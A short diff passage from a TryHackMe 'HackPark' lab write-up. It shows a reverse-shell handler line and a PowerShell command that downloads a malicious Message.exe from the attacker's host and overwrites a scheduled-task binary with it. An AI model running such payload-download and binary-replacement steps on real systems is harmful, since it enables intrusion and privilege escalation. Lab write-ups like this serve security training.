sebastiendamaye/TryHackMe/HackPark/readme.md

 [*] Started reverse TCP handler on 10.9.**.**:3456
 ~~~

-In the existing reverse shell, download your new reverse shell:
+In the existing reverse shell, download your new reverse shell to replace the initial `Message.exe` with it:

 ~~~
 powershell -c "Invoke-WebRequest -Uri 'http://10.9.**.**:8000/Message.exe' -OutFile 'C:\Program Files (x86)\SystemScheduler\Message.exe'"